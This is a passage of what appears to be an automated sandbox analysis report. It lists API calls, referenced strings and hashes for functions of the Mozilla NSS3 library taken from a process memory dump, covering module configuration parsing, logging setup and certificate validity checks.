                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 425d9f4db6de841a69212401355d3fa297fde6b1a3fcb55c9e7c5a22e7b69d57
                                                                        • Instruction ID: 855eccca6cdc22d86bd23ee364ca148fa10bd9464499429fdb5a92acb618ce68
                                                                        • Opcode Fuzzy Hash: 425d9f4db6de841a69212401355d3fa297fde6b1a3fcb55c9e7c5a22e7b69d57
                                                                        • Instruction Fuzzy Hash: ACC04838244608CFC704DA08E4899A43BB8FB096117040094EA028B721DA21F800CA90
                                                                        Function 6CB75DE0 Relevance: 63.3, APIs: 27, Strings: 9, Instructions: 272COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?), ref: 6CB75E08
                                                                        • NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6CB75E3F
                                                                        • PL_strncasecmp.NSS3(00000000,readOnly,00000008), ref: 6CB75E5C
                                                                        • free.MOZGLUE(00000000), ref: 6CB75E7E
                                                                        • free.MOZGLUE(00000000), ref: 6CB75E97
                                                                        • PORT_Strdup_Util.NSS3(secmod.db), ref: 6CB75EA5
                                                                        • _NSSUTIL_EvaluateConfigDir.NSS3(00000000,?,?), ref: 6CB75EBB
                                                                        • NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6CB75ECB
                                                                        • PL_strncasecmp.NSS3(00000000,noModDB,00000007), ref: 6CB75EF0
                                                                        • free.MOZGLUE(00000000), ref: 6CB75F12
                                                                        • NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6CB75F35
                                                                        • PL_strncasecmp.NSS3(00000000,forceSecmodChoice,00000011), ref: 6CB75F5B
                                                                        • free.MOZGLUE(00000000), ref: 6CB75F82
                                                                        • PL_strncasecmp.NSS3(?,configDir=,0000000A), ref: 6CB75FA3
                                                                        • PL_strncasecmp.NSS3(?,secmod=,00000007), ref: 6CB75FB7
                                                                        • NSSUTIL_ArgSkipParameter.NSS3(?), ref: 6CB75FC4
                                                                        • free.MOZGLUE(00000000), ref: 6CB75FDB
                                                                        • NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6CB75FE9
                                                                        • free.MOZGLUE(00000000), ref: 6CB75FFE
                                                                        • NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6CB7600C
                                                                        • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CB76027
                                                                        • PR_smprintf.NSS3(%s/%s,?,00000000), ref: 6CB7605A
                                                                        • PR_smprintf.NSS3(6CC4AAF9,00000000), ref: 6CB7606A
                                                                        • free.MOZGLUE(00000000), ref: 6CB7607C
                                                                        • free.MOZGLUE(00000000), ref: 6CB7609A
                                                                        • free.MOZGLUE(00000000), ref: 6CB760B2
                                                                        • free.MOZGLUE(?), ref: 6CB760CE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: free$L_strncasecmpValue$Param$FetchR_smprintfisspace$ConfigEvaluateParameterSkipStrdup_Util
                                                                        • String ID: %s/%s$configDir=$flags$forceSecmodChoice$noModDB$pkcs11.txt$readOnly$secmod.db$secmod=
                                                                        • API String ID: 1427204090-154007103
                                                                        • Opcode ID: f8d38a178d301edd8d7a654a292400aa6bc69cceffce3c03d4f8e720555720b1
                                                                        • Instruction ID: 4416aead34dd848a1f234337717d1005aa27f1dedc22191d1c04a994d75002e4
                                                                        • Opcode Fuzzy Hash: f8d38a178d301edd8d7a654a292400aa6bc69cceffce3c03d4f8e720555720b1
                                                                        • Instruction Fuzzy Hash: 7C91E4F0D042C55BEF219F259C85BAA3BA8DF06248F080060EC65DBB42E721D959C7B7
                                                                        Function 6CB01D90 Relevance: 45.7, APIs: 16, Strings: 10, Instructions: 182filestringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PR_NewLock.NSS3 ref: 6CB01DA3
                                                                          • Part of subcall function 6CBD98D0: calloc.MOZGLUE(00000001,00000084,6CB00936,00000001,?,6CB0102C), ref: 6CBD98E5
                                                                        • PR_GetEnvSecure.NSS3(NSPR_LOG_MODULES), ref: 6CB01DB2
                                                                          • Part of subcall function 6CB01240: TlsGetValue.KERNEL32(00000040,?,6CB0116C,NSPR_LOG_MODULES), ref: 6CB01267
                                                                          • Part of subcall function 6CB01240: EnterCriticalSection.KERNEL32(?,?,?,6CB0116C,NSPR_LOG_MODULES), ref: 6CB0127C
                                                                          • Part of subcall function 6CB01240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6CB0116C,NSPR_LOG_MODULES), ref: 6CB01291
                                                                          • Part of subcall function 6CB01240: PR_Unlock.NSS3(?,?,?,?,6CB0116C,NSPR_LOG_MODULES), ref: 6CB012A0
                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CB01DD8
                                                                        • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sync), ref: 6CB01E4F
                                                                        • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,bufsize), ref: 6CB01EA4
                                                                        • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,timestamp), ref: 6CB01ECD
                                                                        • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,append), ref: 6CB01EEF
                                                                        • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,all), ref: 6CB01F17
                                                                        • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CB01F34
                                                                        • PR_SetLogBuffering.NSS3(00004000), ref: 6CB01F61
                                                                        • PR_GetEnvSecure.NSS3(NSPR_LOG_FILE), ref: 6CB01F6E
                                                                        • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6CB01F83
                                                                        • PR_SetLogFile.NSS3(00000000), ref: 6CB01FA2
                                                                        • PR_smprintf.NSS3(Unable to create nspr log file '%s',00000000), ref: 6CB01FB8
                                                                        • OutputDebugStringA.KERNEL32(00000000), ref: 6CB01FCB
                                                                        • free.MOZGLUE(00000000), ref: 6CB01FD2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: _stricmp$Secure$BufferingCriticalDebugEnterFileLockOutputR_smprintfSectionStringUnlockValue__acrt_iob_funccallocfreegetenvstrlen
                                                                        • String ID: , %n$%63[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_-]%n:%d%n$NSPR_LOG_FILE$NSPR_LOG_MODULES$Unable to create nspr log file '%s'$all$append$bufsize$sync$timestamp
                                                                        • API String ID: 2013311973-4000297177
                                                                        • Opcode ID: c5840235726af0d77c49258d35b3514ab8456583ab4ef0b6691490244a5a802c
                                                                        • Instruction ID: acf3c84951ffa4a0587564181af0b00576893d1d7901a7bb6d2efc84df4848b1
                                                                        • Opcode Fuzzy Hash: c5840235726af0d77c49258d35b3514ab8456583ab4ef0b6691490244a5a802c
                                                                        • Instruction Fuzzy Hash: AC518DB1E002999BDF04DBE5CD44A9E7BB8EF0134DF084529E919EBA00F774D558CB92
                                                                        Function 6CB74C10 Relevance: 40.4, APIs: 13, Strings: 10, Instructions: 146stringmemoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6CB64F51,00000000), ref: 6CB74C50
                                                                        • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6CB64F51,00000000), ref: 6CB74C5B
                                                                        • PR_smprintf.NSS3(6CC4AAF9,?,0000002F,?,?,?,00000000,00000000,?,6CB64F51,00000000), ref: 6CB74C76
                                                                        • PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6CB64F51,00000000), ref: 6CB74CAE
                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CB74CC9
                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CB74CF4
                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CB74D0B
                                                                        • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6CB64F51,00000000), ref: 6CB74D5E
                                                                        • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6CB64F51,00000000), ref: 6CB74D68
                                                                        • PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6CB74D85
                                                                        • PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6CB74DA2
                                                                        • free.MOZGLUE(?), ref: 6CB74DB9
                                                                        • free.MOZGLUE(00000000), ref: 6CB74DCF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: free$R_smprintf$strlen$Alloc_Util
                                                                        • String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
                                                                        • API String ID: 3756394533-2552752316
                                                                        • Opcode ID: 214291975296118964e025f24e0acbd352a66483d5b1d595874e164922510a94
                                                                        • Instruction ID: 68a010138ae0a6269f43a2d94b965dbbb37d8451c6f202272ce2160397d4dd6b
                                                                        • Opcode Fuzzy Hash: 214291975296118964e025f24e0acbd352a66483d5b1d595874e164922510a94
                                                                        • Instruction Fuzzy Hash: 5B415BB1900191ABDB225F299D44ABA3A79EF8234DF058124EC2657701F731D958CFE3
                                                                        Function 6CB1DDD0 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 169memorystringtimeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PORT_NewArena_Util.NSS3(00000800), ref: 6CB1DDDE
                                                                          • Part of subcall function 6CB70FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CB187ED,00000800,6CB0EF74,00000000), ref: 6CB71000
                                                                          • Part of subcall function 6CB70FF0: PR_NewLock.NSS3(?,00000800,6CB0EF74,00000000), ref: 6CB71016
                                                                          • Part of subcall function 6CB70FF0: PL_InitArenaPool.NSS3(00000000,security,6CB187ED,00000008,?,00000800,6CB0EF74,00000000), ref: 6CB7102B
                                                                        • PORT_ArenaAlloc_Util.NSS3(00000000,00000018), ref: 6CB1DDF5
                                                                          • Part of subcall function 6CB710C0: TlsGetValue.KERNEL32(?,6CB18802,00000000,00000008,?,6CB0EF74,00000000), ref: 6CB710F3
                                                                          • Part of subcall function 6CB710C0: EnterCriticalSection.KERNEL32(?,?,6CB18802,00000000,00000008,?,6CB0EF74,00000000), ref: 6CB7110C
                                                                          • Part of subcall function 6CB710C0: PL_ArenaAllocate.NSS3(?,?,?,6CB18802,00000000,00000008,?,6CB0EF74,00000000), ref: 6CB71141
                                                                          • Part of subcall function 6CB710C0: PR_Unlock.NSS3(?,?,?,6CB18802,00000000,00000008,?,6CB0EF74,00000000), ref: 6CB71182
                                                                          • Part of subcall function 6CB710C0: TlsGetValue.KERNEL32(?,6CB18802,00000000,00000008,?,6CB0EF74,00000000), ref: 6CB7119C
                                                                        • PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6CB1DE34
                                                                        • PR_Now.NSS3 ref: 6CB1DE93
                                                                        • CERT_CheckCertValidTimes.NSS3(?,00000000,?,00000000), ref: 6CB1DE9D
                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CB1DEB4
                                                                        • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CB1DEC3
                                                                        • memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6CB1DED8
                                                                        • PR_smprintf.NSS3(%s%s,?,?), ref: 6CB1DEF0
                                                                        • PR_smprintf.NSS3(6CC4AAF9,(NULL) (Validity Unknown)), ref: 6CB1DF04
                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CB1DF13
                                                                        • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CB1DF22
                                                                        • memcpy.VCRUNTIME140(00000000,00000000,00000001), ref: 6CB1DF33
                                                                        • free.MOZGLUE(00000000), ref: 6CB1DF3C
                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CB1DF4B
                                                                        • free.MOZGLUE(00000000), ref: 6CB1DF74
                                                                        • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CB1DF8E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: ArenaUtil$Alloc_$strlen$Arena_R_smprintfValuefreememcpy$AllocateCertCheckCriticalEnterFreeInitLockPoolSectionTimesUnlockValidcalloc
                                                                        • String ID: %s%s$(NULL) (Validity Unknown)${???}
                                                                        • API String ID: 1882561532-3437882492
                                                                        • Opcode ID: 50b13783cd2eaaabb0f6a955c0a94f2bbd481efae26ab33e5850b5ae27b54273
                                                                        • Instruction ID: 0e7148ab7c046d588180159d9d7e6057972266d0853f98ca9a87fe8c0ed5646d
                                                                        • Opcode Fuzzy Hash: 50b13783cd2eaaabb0f6a955c0a94f2bbd481efae26ab33e5850b5ae27b54273
                                                                        • Instruction Fuzzy Hash: 3D5190B2E042455BDF119E75AC41AAF7BB8EF85759F184029EC09E7B00E731D905CBE2
                                                                        Function 6CB52D80 Relevance: 33.4, APIs: 22, Instructions: 381COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • TlsGetValue.KERNEL32(?,?,?,?,?,00000000,?), ref: 6CB52DEC
                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 6CB52E00
                                                                        • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CB52E2B
                                                                        • PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CB52E43
                                                                        • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,6CB24F1C,?,-00000001,00000000,?), ref: 6CB52E74
                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,6CB24F1C,?,-00000001,00000000), ref: 6CB52E88
                                                                        • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CB52EC6
                                                                        • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CB52EE4
                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CB52EF8
                                                                        • PR_Unlock.NSS3(?), ref: 6CB52F62
                                                                        • TlsGetValue.KERNEL32 ref: 6CB52F86
                                                                        • EnterCriticalSection.KERNEL32(0000001C), ref: 6CB52F9E
                                                                        • PR_Unlock.NSS3(?), ref: 6CB52FCA
                                                                        • TlsGetValue.KERNEL32 ref: 6CB5301A
                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6CB5302E
                                                                        • PR_Unlock.NSS3(?), ref: 6CB53066
                                                                        • PR_SetError.NSS3(00000000,00000000), ref: 6CB53085
                                                                        • PR_Unlock.NSS3(?), ref: 6CB530EC
                                                                        • TlsGetValue.KERNEL32 ref: 6CB5310C
                                                                        • EnterCriticalSection.KERNEL32(0000001C), ref: 6CB53124
                                                                        • PR_Unlock.NSS3(?), ref: 6CB5314C
                                                                          • Part of subcall function 6CB39180: PK11_NeedUserInit.NSS3(?,?,?,00000000,00000001,6CB6379E,?,6CB39568,00000000,?,6CB6379E,?,00000001,?), ref: 6CB3918D
                                                                          • Part of subcall function 6CB39180: PR_SetError.NSS3(FFFFE000,00000000,?,?,?,00000000,00000001,6CB6379E,?,6CB39568,00000000,?,6CB6379E,?,00000001,?), ref: 6CB391A0
                                                                          • Part of subcall function 6CB007A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CA9204A), ref: 6CB007AD
                                                                          • Part of subcall function 6CB007A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA9204A), ref: 6CB007CD
                                                                          • Part of subcall function 6CB007A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA9204A), ref: 6CB007D6
                                                                          • Part of subcall function 6CB007A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CA9204A), ref: 6CB007E4
                                                                          • Part of subcall function 6CB007A0: TlsSetValue.KERNEL32(00000000,?,6CA9204A), ref: 6CB00864
                                                                          • Part of subcall function 6CB007A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CB00880
                                                                          • Part of subcall function 6CB007A0: TlsSetValue.KERNEL32(00000000,?,?,6CA9204A), ref: 6CB008CB
                                                                          • Part of subcall function 6CB007A0: TlsGetValue.KERNEL32(?,?,6CA9204A), ref: 6CB008D7
                                                                          • Part of subcall function 6CB007A0: TlsGetValue.KERNEL32(?,?,6CA9204A), ref: 6CB008FB
                                                                        • PR_SetError.NSS3(00000000,00000000), ref: 6CB5316D
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: Value$Unlock$CriticalEnterSection$Error$calloc$InitK11_NeedUser
                                                                        • String ID:
                                                                        • API String ID: 3383223490-0
                                                                        • Opcode ID: 825dfa44240072d62143e02bb82f7958356ff813f3df2d9cacb41c481f5f939a
                                                                        • Instruction ID: e6653fe310a17642d1606ff7b2c414e865a5c52b7b0df40f6180c47625b2c9bc
                                                                        • Opcode Fuzzy Hash: 825dfa44240072d62143e02bb82f7958356ff813f3df2d9cacb41c481f5f939a
                                                                        • Instruction Fuzzy Hash: 63F18DB1E00258AFDF01DF64D844BADBBB4FF09318F544169EC04A7711EB35A9A5CB92
                                                                        Function 6CB56CD0 Relevance: 30.3, APIs: 20, Instructions: 298stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 6CB56910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6CB56943
                                                                          • Part of subcall function 6CB56910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6CB56957
                                                                          • Part of subcall function 6CB56910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6CB56972
                                                                          • Part of subcall function 6CB56910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6CB56983
                                                                          • Part of subcall function 6CB56910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6CB569AA
                                                                          • Part of subcall function 6CB56910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6CB569BE
                                                                          • Part of subcall function 6CB56910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6CB569D2
                                                                          • Part of subcall function 6CB56910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6CB569DF
                                                                          • Part of subcall function 6CB56910: NSSUTIL_ArgStrip.NSS3(?), ref: 6CB56A5B
                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6CB56D8C
                                                                        • free.MOZGLUE(00000000), ref: 6CB56DC5
                                                                        • free.MOZGLUE(?), ref: 6CB56DD6
                                                                        • free.MOZGLUE(?), ref: 6CB56DE7
                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6CB56E1F
                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CB56E4B
                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CB56E72
                                                                        • free.MOZGLUE(?), ref: 6CB56EA7
                                                                        • free.MOZGLUE(?), ref: 6CB56EC4
                                                                        • free.MOZGLUE(?), ref: 6CB56ED5
                                                                        • free.MOZGLUE(00000000), ref: 6CB56EE3
                                                                        • free.MOZGLUE(?), ref: 6CB56EF4
                                                                        • free.MOZGLUE(?), ref: 6CB56F08
                                                                        • free.MOZGLUE(00000000), ref: 6CB56F35
                                                                        • free.MOZGLUE(?), ref: 6CB56F44
                                                                        • free.MOZGLUE(?), ref: 6CB56F5B
                                                                        • free.MOZGLUE(00000000), ref: 6CB56F65
                                                                          • Part of subcall function 6CB56C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6CB5781D,00000000,6CB4BE2C,?,6CB56B1D,?,?,?,?,00000000,00000000,6CB5781D), ref: 6CB56C40
                                                                          • Part of subcall function 6CB56C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6CB5781D,?,6CB4BE2C,?), ref: 6CB56C58
                                                                          • Part of subcall function 6CB56C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6CB5781D), ref: 6CB56C6F
                                                                          • Part of subcall function 6CB56C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6CB56C84
                                                                          • Part of subcall function 6CB56C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6CB56C96
                                                                          • Part of subcall function 6CB56C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6CB56CAA
                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CB56F90
                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CB56FC5
                                                                        • PK11_GetInternalKeySlot.NSS3 ref: 6CB56FF4
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
                                                                        • String ID:
                                                                        • API String ID: 1304971872-0
                                                                        • Opcode ID: 8115dc759d222f33346cf0c7db8c98d62aebbc2e84f9e8deb4a880ef298e62e7
                                                                        • Instruction ID: 2e9dc85cdea31554d98865b6a0a6bc77e918f52b01bc68722afe991c4f74846a
                                                                        • Opcode Fuzzy Hash: 8115dc759d222f33346cf0c7db8c98d62aebbc2e84f9e8deb4a880ef298e62e7
                                                                        • Instruction Fuzzy Hash: 85B194B0E012999FDF00CFA6D944B9EBBB4EF09348F540124E815E7741E731E965CBA2
                                                                        Function 6CB54C20 Relevance: 30.3, APIs: 20, Instructions: 290memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • TlsGetValue.KERNEL32 ref: 6CB54C4C
                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6CB54C60
                                                                        • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6CB54CA1
                                                                        • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6CB54CBE
                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6CB54CD2
                                                                        • realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB54D3A
                                                                        • PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB54D4F
                                                                        • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6CB54DB7
                                                                          • Part of subcall function 6CBBDD70: TlsGetValue.KERNEL32 ref: 6CBBDD8C
                                                                          • Part of subcall function 6CBBDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CBBDDB4
